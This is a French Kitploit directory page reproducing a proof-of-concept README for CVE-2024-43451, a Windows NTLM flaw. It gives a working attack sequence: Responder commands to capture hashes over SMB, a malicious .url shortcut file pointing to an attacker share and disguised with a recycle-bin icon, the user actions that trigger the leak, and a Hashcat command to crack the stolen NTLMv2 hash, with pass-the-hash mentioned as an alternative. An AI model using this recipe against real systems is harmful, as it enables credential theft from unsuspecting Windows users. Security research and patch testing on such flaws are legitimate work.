Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-43451-POC — CVE-2024-43451 est une vulnérabilité NTLM de Windows qui permet à un attaquant de forcer l'authentification et de capturer des hachages NTLM en utilisant des raccourcis malveillants. | Kitploit
Outils/GitHubGitHub/ronf98/cve-2024-43451-poc
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationPost-ExploitationHameçonnageAnalyse de Malware
GitHubronf98/cve-2024-43451-poc

CVE-2024-43451-POC

CVE-2024-43451 est une vulnérabilité NTLM de Windows qui permet à un attaquant de forcer l'authentification et de capturer des hachages NTLM en utilisant des raccourcis malveillants.

Voir le dépôt
1513il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description

  • Name : CVE-2024-43451
  • CVSSv3 Score : 6.5
  • Affected Versions : All Microsoft Windows versions before the Nov 2024 Patch

CVE-2024-43451 est une vulnérabilité zero-day dans Microsoft Windows qui permet aux attaquants de capturer des hachages de mot de passe NTLMv2 avec une interaction minimale de l'utilisateur, pouvant conduire à un vol d'identifiants. Une méthode couramment exploitée consiste à utiliser l'authentification NTLM via des connexions SMB vers un serveur distant afin de capturer le hachage. Cette vulnérabilité a été corrigée dans les mises à jour de novembre 2024. Il est conseillé aux utilisateurs d'appliquer les correctifs de sécurité pertinents pour atténuer le risque.

Cette attaque a été découverte activement exploitée via un e-mail de phishing envoyé depuis un serveur gouvernemental ukrainien compromis. L'e-mail contient un fichier URL malveillant. Lorsque l'utilisateur interagit avec le fichier en cliquant droit, en le supprimant ou en le déplaçant, la vulnérabilité est activée. Cela déclenche une connexion au serveur de l'attaquant, entraînant le téléchargement de fichiers malveillants supplémentaires, tels que le malware SparkRAT (un cheval de Troie d'accès à distance open-source qui permet à l'attaquant de prendre le contrôle du système de la victime).

Authentification NTLM

NTLMv2 est actuellement la version la plus sécurisée et la plus pertinente aujourd'hui.

  • Le client se connecte au serveur et demande l'accès à une ressource.
  • Le serveur génère un nonce (un défi aléatoire de 16 octets) et l'envoie au client.
  • Le client envoie une réponse générée à l'aide de l'algorithme HMAC-MD5 qui inclut le hachage du mot de passe (en utilisant l'algorithme NT hash), le nonce du serveur, l'horodatage, le nonce du client et plus encore.
  • Le serveur utilise le NT hash et répète les mêmes calculs pour lui-même afin de produire sa propre réponse NTLM, une fois qu'ils ont chacun leur propre réponse, ils peuvent les comparer.
  • Une fois comparés, le serveur décide d'accepter ou de refuser la connexion.

image

Exploitation

Configuration du POC

Pour créer un environnement de travail pour ce POC, nous devons configurer une machine Windows cible avec un numéro de build publié avant novembre 2024, et un serveur distant pour simuler la capture du hachage :

  1. Téléchargez et installez Responder pour capturer le hachage via SMB :
    root@kitploit:~
    brew install python3
    
    root@kitploit:~
    git clone https://github.com/lgandx/Responder.git
    
    root@kitploit:~
    cd Responder
    
    root@kitploit:~
    sudo python3 Responder.py -I <put your network interface> -v
    
  2. Assurez-vous qu'il y a une connexion réussie entre la machine Windows cible et votre environnement "hacker" distant.
  3. Testez la configuration de Responder en allant dans l'explorateur et en tapant \\(adresse IP du serveur distant) :

image

Création de l'exploit

Puisque tout ce dont l'exploit a besoin est d'établir une connexion SMB avec le serveur distant, nous pouvons utiliser un simple fichier pour le simuler :

  1. Ouvrez le Bloc-notes
  2. Saisissez ce qui suit : Vous pouvez choisir n'importe quelle icône qui inciterait l'utilisateur à interagir, j'ai utilisé l'icône "corbeille pleine" (32)
    root@kitploit:~
    [InternetShortcut]
    URL=\\(adresse IP du serveur distant)\share
    IconIndex=32
    IconFile=C:\Windows\System32\shell32.dll
    
  3. Enregistrez-le sous (nom).url

Processus actif

Une fois le fichier préparé et livré sur le système cible, le vol du hachage nécessite une interaction minimale de l'utilisateur. Cette interaction peut inclure l'une des actions suivantes :

  • Téléchargement du fichier et accès au dossier "Téléchargements"
  • Clic droit sur le fichier
  • Déplacement du fichier vers un autre dossier

https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058

https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2

Cracking

Avec le hachage non chiffré en main, nous pouvons soit tenter de le casser pour révéler le mot de passe en clair, soit l'utiliser dans une attaque "Pass-the-Hash" avec des outils comme Mimikatz ou Metasploit.

Dans notre cas, une simple commande Hashcat révèle mon mot de passe : hashcat -m 5600 leak.txt rockyou.txt

image

Télécharger l’outil